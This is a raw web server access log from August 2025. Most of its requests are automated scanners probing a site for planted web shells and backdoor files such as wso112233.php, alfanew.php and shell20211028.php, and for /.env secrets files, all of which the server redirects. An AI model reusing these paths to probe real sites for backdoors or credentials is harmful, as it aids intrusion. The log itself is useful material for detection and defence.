185.241.208.231 - - [12/Aug/2025:01:07:40 +0300] "GET /.well-known/wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:44 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
210.139.243.182 - - [12/Aug/2025:01:07:46 +0300] "GET //wp-includes/Text/Diff/zwso.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
185.241.208.231 - - [12/Aug/2025:01:07:48 +0300] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:56 +0300] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:01 +0300] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:04 +0300] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:26 +0300] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:30 +0300] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
165.232.65.95 - - [12/Aug/2025:00:59:50 +0300] "GET /wp-includes/Text/Diff/orm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:30 +0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:35 +0300] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:06:49 +0300] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:11 +0300] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:17 +0300] "GET /alfadheat.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:22 +0300] "GET /M1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:31 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:07:36 +0300] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:09 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:19 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:38 +0300] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:42 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:45 +0300] "GET /wp-header.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:49 +0300] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:56 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:08:53 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:09:02 +0300] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:09:05 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:09:13 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:09:17 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
186.122.224.25 - - [12/Aug/2025:01:14:44 +0300] "POST //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
185.241.208.231 - - [12/Aug/2025:01:08:59 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:09:09 +0300] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
82.115.46.55 - - [12/Aug/2025:01:16:01 +0300] "POST //wp-includes/Text/Diff/mailer.php?pass=123 HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
194.145.227.125 - - [12/Aug/2025:01:18:00 +0300] "GET /wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php HTTP/1.1" 301 795 "-" "ALittle Client"
34.53.3.173 - - [12/Aug/2025:01:25:52 +0300] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:53 +0300] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:53 +0300] "HEAD /wp HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:53 +0300] "HEAD /bc HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:53 +0300] "HEAD /bk HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:54 +0300] "HEAD /backup HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:54 +0300] "HEAD /old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:54 +0300] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:54 +0300] "HEAD /main HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.53.3.173 - - [12/Aug/2025:01:25:54 +0300] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:03 +0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:15 +0300] "GET /wp.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:20 +0300] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:27 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:36 +0300] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:45 +0300] "GET /M1.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:49 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:03 +0300] "GET /.well-known/wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:07 +0300] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:11 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:24 +0300] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:31 +0300] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:42 +0300] "GET /alfadheat.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:51 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:32:57 +0300] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:05 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:10 +0300] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:14 +0300] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:27 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:33 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:37 +0300] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:44 +0300] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:49 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:52 +0300] "GET /wp-header.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:56 +0300] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:07 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:17 +0300] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:23 +0300] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:29 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:19 +0300] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:24 +0300] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:33:40 +0300] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:02 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:12 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:21 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.241.208.231 - - [12/Aug/2025:01:34:33 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.76.186.12 - - [12/Aug/2025:02:57:27 +0300] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:29 +0300] "GET /.trash7309/index.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:32 +0300] "GET /deployment.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:58:09 +0300] "GET /wp-content/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:58:10 +0300] "GET /wp-admin/js/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:58:11 +0300] "GET /wp-admin/wp-conflg.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:40 +0300] "GET /goat.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:43 +0300] "GET /sHS.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:44 +0300] "GET /checkbox.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:46 +0300] "GET /suu.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:48 +0300] "GET /debug.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:50 +0300] "GET /6.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:51 +0300] "GET /header.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:51 +0300] "GET /5index.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:53 +0300] "GET /staging.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:54 +0300] "GET /faq.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:55 +0300] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:56 +0300] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:57:57 +0300] "GET /403.php HTTP/1.1" 301 795 "-" "-"
13.76.186.12 - - [12/Aug/2025:02:58:02 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "-"
103.177.124.24 - - [12/Aug/2025:03:19:30 +0300] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
114.119.145.188 - - [12/Aug/2025:03:22:32 +0300] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
103.177.124.24 - - [12/Aug/2025:03:26:14 +0300] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
149.34.245.196 - - [12/Aug/2025:03:30:30 +0300] "POST / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
114.119.139.167 - - [12/Aug/2025:03:30:43 +0300] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
149.34.245.196 - - [12/Aug/2025:03:30:30 +0300] "GET /.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.169.76.113 - - [12/Aug/2025:03:41:26 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
52.169.76.113 - - [12/Aug/2025:03:41:29 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
199.45.154.145 - - [12/Aug/2025:04:24:34 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.145 - - [12/Aug/2025:04:24:41 +0300] "GET /favicon.ico HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
